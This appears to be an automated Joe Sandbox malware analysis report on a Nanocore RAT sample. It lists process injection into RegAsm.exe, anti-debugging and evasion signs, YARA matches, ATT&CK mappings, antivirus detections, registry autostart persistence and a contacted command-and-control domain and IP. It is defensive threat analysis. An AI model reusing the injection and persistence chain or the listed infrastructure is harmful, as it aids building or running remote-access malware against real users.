        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe TID: 4060Thread sleep time: -69980s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6284Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6256Thread sleep time: -100000s >= -30000s
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6580Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat TID: 6980Thread sleep count: 603 > 30
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 4344Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeThread sleep count: Count: 6998 delay: -10
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2C93C FindFirstFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A2F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009E4696 GetFileAttributesW,FindFirstFileW,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EF65E FindFirstFileW,Sleep,FindNextFileW,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EC93C FindFirstFileW,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009EBF27 FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: RegAsm.exe, 00000001.00000002.516655342.0000000002530000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A341FD BlockInput,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F5CCC EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A3C304 LoadLibraryA,GetProcAddress,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_3_040A00BE mov esi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009EA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009EA364 SetUnhandledExceptionFilter,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 12_2_009AA364 SetUnhandledExceptionFilter,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 protect: page execute and read and write
        Contains functionality to inject code into remote processes
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_3_040A00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000 value starts with: 4D5A
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 400000
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 7F3008
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A18C93 LogonUserW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A24EF5 mouse_event,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A181F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A24C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
        Source: RegAsm.exe, 00000001.00000002.521170908.0000000002DD9000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmp, DiagnosticsHub.StandardCollector.Service.exe.batBinary or memory string: Shell_TrayWnd
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000002.517905709.0000000002890000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.516522932.0000000001020000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: RegAsm.exe, 00000001.00000002.519590997.0000000002BDF000.00000004.00000001.sdmpBinary or memory string: Program Manager<
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009E886B cpuid
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A02230 GetUserNameW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A02230 GetUserNameW,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F418A _free,_strlen,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009F418A _free,_strlen,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_009C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT
        Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY
        Source: Yara match File source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY
        Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY
        Source: Yara match File source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY
        Source: Yara match File source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe Binary or memory string: WIN_81
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe Binary or memory string: WIN_XP
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe Binary or memory string: WIN_XPe
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe Binary or memory string: WIN_VISTA
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe Binary or memory string: WIN_7
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe Binary or memory string: WIN_8
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

        Remote Access Functionality:

        Detected Nanocore Rat
        Source: e5bd3238d220c97cd4d6969abb3b33e0.exe, 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 00000001.00000002.519042278.0000000002B51000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: DiagnosticsHub.StandardCollector.Service.exe.bat, 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Source: RegAsm.exe, 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RAT
        Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY
        Source: Yara match File source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY
        Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY
        Source: Yara match File source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY
        Source: Yara match File source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe Code function: 0_2_00A36596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,
        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe Code function: 0_2_00A36A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 1_2_04EB262A bind,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 1_2_04EB25D8 bind,

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts 2 | Native API 1 | Startup Items 1 | Startup Items 1 | Disable or Modify Tools 11 | Input Capture 31 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
        Default Accounts | Scheduled Task/Job | DLL Side-Loading 1 | Exploitation for Privilege Escalation 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Input Capture 31 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Application Shimming 1 | DLL Side-Loading 1 | Obfuscated Files or Information 2 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 2 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Valid Accounts 2 | Application Shimming 1 | Software Packing 11 | NTDS | System Information Discovery 26 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Registry Run Keys / Startup Folder 2 | Valid Accounts 2 | DLL Side-Loading 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Access Token Manipulation 21 | Masquerading 12 | Cached Domain Credentials | Security Software Discovery 41 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 11 | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Process Injection 412 | Valid Accounts 2 | DCSync | Virtualization/Sandbox Evasion 4 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Registry Run Keys / Startup Folder 2 | Virtualization/Sandbox Evasion 4 | Proc Filesystem | Process Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation 21 | /etc/passwd and /etc/shadow | Application Window Discovery 11 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
        Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 412 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
        Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Hidden Files and Directories 1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        e5bd3238d220c97cd4d6969abb3b33e0.exe | 69% | ReversingLabs | Win32.Trojan.Nymeria
        e5bd3238d220c97cd4d6969abb3b33e0.exe | 100% | Avira | HEUR/AGEN.1100084

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat | 100% | Avira | HEUR/AGEN.1100084
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | Metadefender |
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | ReversingLabs |

        Unpacked PE Files

        Source | Detection | Scanner | Label
        0.0.e5bd3238d220c97cd4d6969abb3b33e0.exe.9c0000.0.unpack | 100% | Avira | HEUR/AGEN.1100084
        0.2.e5bd3238d220c97cd4d6969abb3b33e0.exe.9c0000.0.unpack | 100% | Avira | HEUR/AGEN.1100084
        1.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        12.2.DiagnosticsHub.StandardCollector.Service.exe.bat.980000.0.unpack | 100% | Avira | HEUR/AGEN.1100084
        12.0.DiagnosticsHub.StandardCollector.Service.exe.bat.980000.0.unpack | 100% | Avira | HEUR/AGEN.1100084
        12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        14.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        windowslivesoffice.ddns.net | 87.65.28.27 | true | true | | unknown

          Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          87.65.28.27 | unknown | Belgium | 5432 | PROXIMUS-ISP-ASBE | true

          Private

          IP
          127.0.0.1

          General Information

          Joe Sandbox Version: 31.0.0 Red Diamond
          Analysis ID: 320085
          Start date: 19.11.2020
          Start time: 01:51:24
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 10m 53s
          Hypervisor based Inspection enabled: false
          Report type: light
          Sample file name: e5bd3238d220c97cd4d6969abb3b33e0 (renamed file extension from none to exe)
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed: 26
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@8/7@6/2
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 2.9% (good quality ratio 2.7%)
          • Quality average: 69.9%
          • Quality standard deviation: 21.2%
          HCA Information:
          • Successful, ratio: 70%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          Warnings:
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.139.144, 168.61.161.212, 52.255.188.83, 2.20.84.85, 104.43.193.48, 51.104.144.132, 2.23.155.128, 2.23.155.153, 51.103.5.159, 95.101.22.125, 95.101.22.134, 52.155.217.156, 20.54.26.129, 51.104.139.180
          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, skypedataprdcolwus15.cloudapp.net
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/320085/sample/e5bd3238d220c97cd4d6969abb3b33e0.exe

          Simulations

          Behavior and APIs

          Time | Type | Description
          01:52:29 | API Interceptor | 1006x Sleep call for process: RegAsm.exe modified
          01:52:30 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          01:52:38 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk

          Joe Sandbox View / Context

          IPs

          Match: 87.65.28.27

                                                  Domains

                                                  Match: windowslivesoffice.ddns.net

                                                  ASN

                                                  Match: PROXIMUS-ISP-ASBE

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  Match: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

                                                                                          Created / dropped Files

                                                                                          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
